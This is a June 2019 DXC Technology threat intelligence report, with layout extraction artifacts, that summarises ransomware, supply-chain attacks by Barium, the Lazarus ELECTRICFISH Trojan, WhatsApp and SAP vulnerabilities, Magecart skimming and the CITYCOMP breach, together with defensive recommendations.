Sie sind auf Seite 1von 9

June 2019

Threat
Intelligence
Report

N-
R-
CTU
C
UBLI
R

IN THIS ISSUE
• New supply chain threats
• Ransomware exploits Oracle WebLogic
• Hacktivism on the rise
• WhatsApp risks to mobile devices
• New Lazarus Trojan discovered
June 2019

About this report Supply chain vulnerabilities expose critical assets


Fusing a range of public and
proprietary information feeds,
including DXC’s global network of
security operations centers and
cyber intelligence services, this Mark Hughes
report delivers a overview of major Senior Vice President and General Manager of Security
incidents, insights into key trends DXC Technology
and strategic threat awareness. We’ve seen another active month with third-party security risks playing a role in major
breaches, meaning it is more critical than ever to understand supply chain exposure.
This report is a part of Ransomware continues to be a growing threat, with an increasing number of attacks
DXC Labs | Security, which provides against enterprise environments, often referred to as big game hunting.
insights and thought leadership to
the security industry. Hacktivist groups are also very active, but the good news is these attacks are becoming
Intelligence cutoff date: less effective where proper security controls are in place. I encourage you to read more
May 24, 2019
about the latest threats.

Table of Contents
Threat New ransomware variant exploits Oracle Web- Multi-industry
updates Logic vulnerability

Hacktivism increases in the first quarter of 2019 Public Sector,


but is less effective Healthcare, Educa-
tion
E-commerce attacks more valuable than ever
Retail

Nation state Advanced supply-chain attacks attributed to Multi-industry


& geopolitical Chinese group dubbed Barium
updates
Lazarus group develops new Trojan malware Public Sector Manu-
dubbed ELECTRICFISH facturing, Technolo-
gy & Research
Vulnerability WhatsApp vulnerability leads to compromise of Multi-industry
updates mobile devices in highly targeted attack

50,000 enterprises may be at risk to potential Multi-industry


SAP software vulnerabilities

Incidents/ MIRRORTHIEF targets 201 online campus stores Retail


Breaches with card-skimming attack

Multi-industry
Possible MegaCortex ransomware attack
disrupts accounting software provider Wolters
Kluwer
Multi-industry
CITYCOMP breach exposes financial data of
numerous enterprises
June 2019

Attack
Threat updates
motivations
New ransomware variant exploits Oracle WebLogic vulnerability
81% Attackers are using vulnerability CVE-2019-2725 to facilitate the spread of a new ransomware
variant dubbed Sodinokibi.
Cybercrime

14% Impact

The critical vulnerability affects Oracle WebLogic servers, used for building and deploying en-
Espionage
terprise applications, allows for unauthenticated remote code execution. Attackers require no
user interaction to deploy the ransomware. Once installed, the ransomware instructs victims to
3% transfer bitcoin to a specified address in return for the decryptor.
Cyberwarfare

Notable features of the ransomware include the use of vssadmin.exe to delete automatic sys-
1% tem backups and attackers that follow up the Sodinokibi deployment with attempts to infect
Hacktivism
the same target with GandCrab ransomware. Industries and organizations targeted remain

Source: Hackmageddon out of the public domain, although Cisco Talos suggests there have been numerous victims.
Source: Threatpost, Cisco Talos

DXC perspective
Organizations using Oracle WebLogic are urgently encouraged to patch servers. The flaw was
not patched in the standard quarterly update in April.

Hacktivism increases in first quarter of 2019


Prominent hacktivist collectives such as Anonymous, LulzSec and various newer groups con-
tinue to use relatively low-skill attack vectors — such as distributed denial of service (DDoS),
website defacement, and exploitation of misconfigured databases — to gain attention and
support their various ideologies and causes.
Most targeted
industries
Impact
1. Multi-industry attacks Attack success rates vary, typically in relation to the cyber defense maturity of the targeted
organization. Recent successes have been seen against government departments in Africa,
2. Public Sector where Ghost Squad Hackers continued a campaign against the Sudanese government. In
3. Communications, early April, Ghost Squad and others claimed to be launching DDoS attacks against 260 do-
Entertainment & Tech mains a day, leading up to the removal of the autocratic president Omar al-Bashir. Anony-
mous launched similar attacks on departments of the Zimbabwe government in late 2018.
4. Health & Life Sciences
5. Banking & Capital Other hacktivist collectives, particularly those operating in high-income countries, have
Markets reportedly had more difficultly when targeting government and media interests. Many groups
now focus on low-hanging fruit, such as government subsections or universities.
Source: Wired

DXC perspective
Hacktivist campaigns will continue targeting multiple industry verticals with public sector,
energy, education and healthcare at heightened risk. The attackers typically will be
motivated by political, social and environmental issues.

Faced with maturing cyber defenses, hacktivists may seek to increase social engineering
activities and use novel methods to disrupt targets. Misinformation campaigns, aimed at dam-
aging a target’s “brand,” could further provide hacktivists opportunities to cause
3 disruption outside of the scope of traditional cyber defenses.
June 2019

E-commerce attacks more valuable than ever


Payment card information stolen from online stores is increasing in value as demand for card
verification value (CVV) numbers is outstripping supply.

Impact
CVV resale prices have now risen to match those of cloned payment cards used at physical
point-of-sale (POS) terminals.

Previously, data stolen with “card present” — where criminals create physical clones of cards —
was considerably more valuable than cards used only online. POS card clones were $15 to $20
a card, whereas CVVs ranged from $2 to $8.

However, recent monitoring of dark web marketplaces shows CVVs are now as valuable as POS
Barium APT data sets. A single CVV will routinely cost in excess of $20. The principal drivers for this dymanic
Who are they? are likely an increased demand for stolen card data on the dark web and increased difficulty in
• Advanced adversary that uses cloning physical cards due to wider chip-and-pin adoption in G20 nations.
supply chain compromise to enable Source: Gemini Advisory
highly focused targeting. Also
known as Wicked Panda or Shad- DXC perspective
owHammer. This situation may partly explain the increased prevelance of attacks on e-commerce sites in
Where do they operate? the last 12 months, with a number of prominent card-skimming campaigns hitting online stores
• Intelligence and analysis suggest across various industries.
they are likely Chinese-speaking.
They target globally. Nation state and geopolitical updates
What do they want?
• Barium appears to focus on target- Advanced supply chain attacks attributed to Chinese group
ed espionage, most likely in support dubbed Barium
of Chinese strategic goals. Intellec- The group is believed to be responsible for the significant breaches of ASUS in March 2019 and
tual property, sensitive government Avast’s CCleaner software, affecting 500,000 and 700,000, respectively.
documents and research are likely
objectives. Impact
Barium uses supply chain attacks to compromise hosts en masse, but actively exploits only a
Do they work alone?
small number of preselected targets. Of the half-million devices implicated in the ASUS breach,
• Probably not. They have links to
the malware activated on only 600, based on predefined MAC addresses written into the exploit
state-sponsored Chinese group APT
code. Similarly, only 70 of those compromised by CCleaner saw secondary spyware down-
17 and potentially cybercriminal
loads.
group Winniti.
How can I stop them? Features
• Defense in depth and mature tech- The group typically exploits trusted models to deploy malware. Notably, it compromises update
nology solutions are required. Fun- servers of suppliers and uses them to push out malicious payloads under the guise of being
damental security solutions include legitimate updates. The group’s access to the suppliers enables it to use genuine signatures and
understanding your supply chain certificates, making detection early in the kill chain extremely challenging. Evidence suggests
risk and effective mailbox, endpoint Barium also links supply chain attacks to gain deeper or more advantageous access. The com-
and network protections. promise of CCleaner, for example, was used to target ASUS.

Though Barium’s ability to compromise major software and hardware suppliers has given it
access to more than a million devices, the group appears to show little interest in destructive
actions. Instead, it focuses on highly targeted espionage operations. Its targets are not known,
but intelligence points toward the group being aligned with Chinese state interests. Barium may
also operate as part of a wider collective of advanced adversaries. Its code shares
4
June 2019

fingerprints with code previously used by the state-sponsored Chinese group APT 17, and it
shares tooling with cybercriminal group Winnti.
Source: Kaspersky, Wired

DXC perspective
Barium poses a serious and credible risk to public sector, research and technology enterprises
holding intellectual property that would be advantageous to Chinese strategic aims. It also
poses a serious threat to suppliers of hardware and software, which it will seek to compromise
to gain access to their true targets.
Though best known for financially
motivated attacks, Lazarus has devel-
For the true target, preventing Barium from gaining initial access may prove challenging.
oped capabilities to conduct sophisticat-
Through compromise of supply chains, the group can package its well-obfuscated malicious
ed espionage.
payloads within legitimate activities and with genuine certificates.

More crucial is the ability to detect and disrupt malicious activity within your networks at the
earliest opportunity. Next-generation endpoint detection systems, well-configured security
information and event management (SIEM) and user-entity-behavior analytics can assist in
detection. Diligent privilege and account management, coupled with network segmentation, is
an effective method of disrupting adversaries in their efforts to navigate internal networks to
obtain sensitive information.

Lazarus group develops new Trojan malware dubbed ELECTRICFISH


Though best-known for attacks aimed at financial gain, Lazarus retains its capability to con-
duct advanced espionage operations. Its latest backdoor Trojan, ELECTRICFISH, was discov-
ered following joint work of the U.S. Department of Homeland Security and the Federal Bureau
of Investigation.

Impact
The malware is predominately an application to tunnel traffic between a specified source and
a destination IP address. It uses a custom protocol to tunnel traffic and continuously attempts
to reach out from both the source and the destination systems, allowing either side to initiate a
tunneling session.

The malware can be configured with a proxy server/port and proxy username and password,
which allows the adversary to bypass the compromised system’s required authentication to
reach outside of the network. Indicators of compromise are available.
Source: US Cert

DXC perspective
Lazarus is likely to target organizations that hold information that may aid North Korean stra-
tegic interests. This may include public sector organizations in North America, Europe and the
Asia-Pacific region, and global manufacturing, technology and research organizations.

Although this spyware appears to hold greatest utility in espionage operations, Lazarus has
traditionally been oriented toward financial gain. It remains possible this tooling could be used
to support data-theft-for-ransom attacks. This risk will heighten should the economic situation
in North Korea continue to degrade.

5
June 2019

Vulnerability updates
WhatsApp vulnerability leads to compromise of mobile devices
in highly targeted attack
WhatsApp pushed an update to its 1.5 billion users after it became aware of a buffer over-
Prominent ransomeware (2019) flow vulnerability that allowed the installation of spyware on mobile devices.

LockerGaga
Impact
• Targeted manufacturing and
The vulnerability exists in the WhatsApp voice over IP (VoIP) stack and allows remote code
industrial enterprises. Operated by
execution via a specially crafted series of Secure Real-time Transport Control Protocol
an advanced actor that combined
(SRTCP) packets sent to a target phone. Threat actors have already exploited the flaw to
automated and manual techniques
install spyware on devices without the need for user interaction. It is widely reported that
to maximize infection scale.
various journalists, NGOs and human rights activists were principal targets in this cam-
Ryuk paign.
• Initially thought to be a revised Her-
mes ransomware strain, operated The exploit was reportedly developed by the Israeli technology company NSO Group. The
by a North Korean group. However, NSO Group is believed to supply spyware techonology to a range of governments globally.
new intelligence suggests it is oper- The NSO Group says it doesn’t operate any of the tools it develops.
ated by a prominent Russian cyber Source: ArsTechnica, Infosecurity Magazine
criminal. Targets enterprise-scale
organizations using Emotet for DXC perspective
initial access. Exploitation of this vulnerability has been highly targeted to date. However, the WhatsApp
PewCryp security update could be reverse engineered, putting exploits into the hands of more adver-
• Bizarrely does not require a finan- saries.
cial ransom, rather wanting victims
to subscribe to YouTuber PewDiePie Organizations should ensure that staff are using the latest WhatsApp version on both work
in order to receive a decryptor. and personal devices to mitigate the risk of this exploit.
Distributed via spam.
50,000 enterprises may be at risk to potential SAP
Katyusha
software vulnerabilities
• First appeared in late 2017 and
Potential vulnerabilities in some SAP software leave enterprises exposed, according to
uses the EternalBlue and Dou-
Onapsis Research Labs.
blePulsar exploits to propagate.
Primarily delivered via spam.
Impact
GandCrab An exploit tool called “10KBLAZE” utilizes errors in SAP NetWeaver configurations to gain
• Widely seen in 2018, with its unrestricted access to SAP systems. . As well as data theft and destruction, attackers could
ransomware-as-a-service model manipulate transaction data by creating vendors, releasing shipments and making fraudu-
popular with cybercriminals. Still a lent payments. It is estimated that 50,000 enterprises may be affected by this vulnerability.
principal threat in 2019. Bitdefender Source: SAP, Reuters
has recently released an updated
decryptor. DXC perspective
Adversaries will quickly look to identify and exploit this vulnerability, and exploit source
code is already available. SAP recommends that organizations comply with SAP Security
Notes #821875, #1408081 and #1421005. SAP’s patch for this vulnerability should be applied
as a critical priority.

6
June 2019

Incidents and breaches


Mirrorthief targets 201 online campus stores with card-skim-
ming attack
TrendMicro reported that the Mirrorthief group’s latest round of card-skimming attacks,
a tactic often referred to by the umbrella term “Magecart,” has affected 201 campus
e-commerce stores.

Impact
As with previous Magecart incidents, payment card data was copied and exfiltrated to a
malicious server at the point of user entry to the payment page.
Mirrorthief compromised PrismWeb, the e-commerce platform used by the stores, to inject
its malicious code. Victim numbers remain unknown.
Source: TrendMicro

DXC perspective
Third-party contributor or supplier compromise remains a highly effective way for adver-
saries to inject skimming code into an array of stores by simply compromising a single
platform. The enduring success of this model will likely see it increase in prevalence.
The security of third-party contributors is integral to the security of an e-commerce plat-
form. Organizations should include third-party security considerations within their wider
security architecture.

Possible MegaCortex ransomware attack disrupts accounting


software provider Wolters Kluwer
Access to software giant Wolters Kluwer’s CCH Axcess product, a cloud-based tax prepa-
ration, compliance and workflow management solution, was disrupted in early May due
to what the organization initially described as “technical anomalies.” Though it ultimately
admitted experienceing a malware incident, Wolters Kluwer stressed that no sensitive data
had been stolen and customers had not been otherwise affected.

Impact
Although formal details of the malware are not in the public domain, intelligence suggests
the company suffered a MegaCortex ransomware attack. MegaCortex, much like oth-
er prominent malware types such as Ryuk and LockerGoga, leverages both automated
scripts and manual activity to maximize the number of victims and scale of infection. There
is some suggestion that MegaCortex may use the Emotet or Qbot malware to aid in gain-
ing initial network access, a tactic not uncommon in ransomware aimed at enterprise-level
targets.

The similarities between MegaCortex and other prominent ransomware families go further.
At least one command-and-control (C2) address is shared and the list of processes and
services in the batch file is nearly identical to LockerGoga infections.
Source: SecurityWeek, Sophos

DXC perspective
Ransomware targeted at enterprise environments is a growing trend dubbed “big game
hunting.” Adversaries typically infect en masse using automated vectors, often using
Trojan malware delivered by spam or drive-by download, and then laterally move through
7 networks to compromise domain controllers using manual techniques. Once domain con-
June 2019

trollers are accessed, the ransomware binaries can be pushed out to the network, maxi-
mizing the scale of infection.

The best defense for enterprises is preventing initial compromise through mailbox filtering,
perimeter defenses and endpoint security solutions. Next-generation endpoint security
and SIEM can also detect suspicious internal actions prior to the ransomware binaries
being pushed out by domain controllers, thereby increasing the organization’s ability to
disrupt adversaries early in the kill chain.

CITYCOMP breach exposes financial data of


numerous enterprises
CITYCOMP, an IT supplier to multiple blue chip organizations, suffered a significant
data-theft-for-ransom attack in late April. Details of how the attackers gained access to
CITYCOMP are not in the public domain at this time.

Impact
The attackers stole significant amounts of data pertaining to key clients, including
Oracle, Toshiba, Volkswagen and Airbus. The attackers attempted to extort CITYCOMP
by threatening to release the data if a ransom was not paid. When CITYCOMP did not
comply, the data was released to the dark web.
Source: Sophos

DXC perspective
Ransomware is only one type of extortion attack. Data theft for ransom remains a credi-
ble threat, often proving more lucrative for attackers than data theft for resale.

Learn more
Thank you for reading the Threat Intelligence Report. Learn more about security trends
and insights from DXC Labs | Security:

DXC Labs | Security

DXC Labs delivers thought leadership technology prototypes to enable


enterprises to thrive in the digital age.

DXC Labs | Security brings together our world-class advisors to develop


strategic and architectural insights to reduce digital risk. DXC’s Cyber
Reference Architecture is at the heart of our research, providing clients with
detailed guidance on methods to efficiently resolve the most challenging
security problems. We help clients minimize risk while taking maximum
advantage of the digital commons.

Lean more at www.dxc.technology/securitylabs


June 2019

DXC in Security
Recognized as a leader in security services, DXC Technology helps clients prevent po-
tential attack pathways, reduce cyber risk, and improve threat detection and incident
response. Our expert advisory services and 24x7 managed security services are backed
by 3,500+ experts and a global network of security operations centers.

DXC provides solutions tailored to our clients’ diverse security needs, with areas of spe-
cialization in Intelligent Security Operations, Identity and Access Management, Data Pro-
tection and Privacy, Security Risk Management, and Infrastructure and Endpoint Security.
Learn how DXC can help protect your enterprise in the midst of large-scale digital change.
Visit www.dxc.technology/security.

Stay current on the latest threats


www.dxc.technology/threats

About DXC Technology


As the world’s leading independent, end-to-end IT services company, DXC Technology
(NYSE: DXC) leads digital transformations for clients by modernizing and integrating their
mainstream IT, and by deploying digital solutions at scale to produce better business
outcomes. The company’s technology independence, global talent, and extensive partner
network enable 6,000 private and public-sector clients in 70 countries to thrive on change.
DXC is a recognized leader in corporate responsibility. For more information, visit
www.dxc.technology and explore thrive.dxc.technology, DXC’s digital destination for
changemakers and innovators.

8 © Copyright 2019 DXC Technology Company. All rights reserved.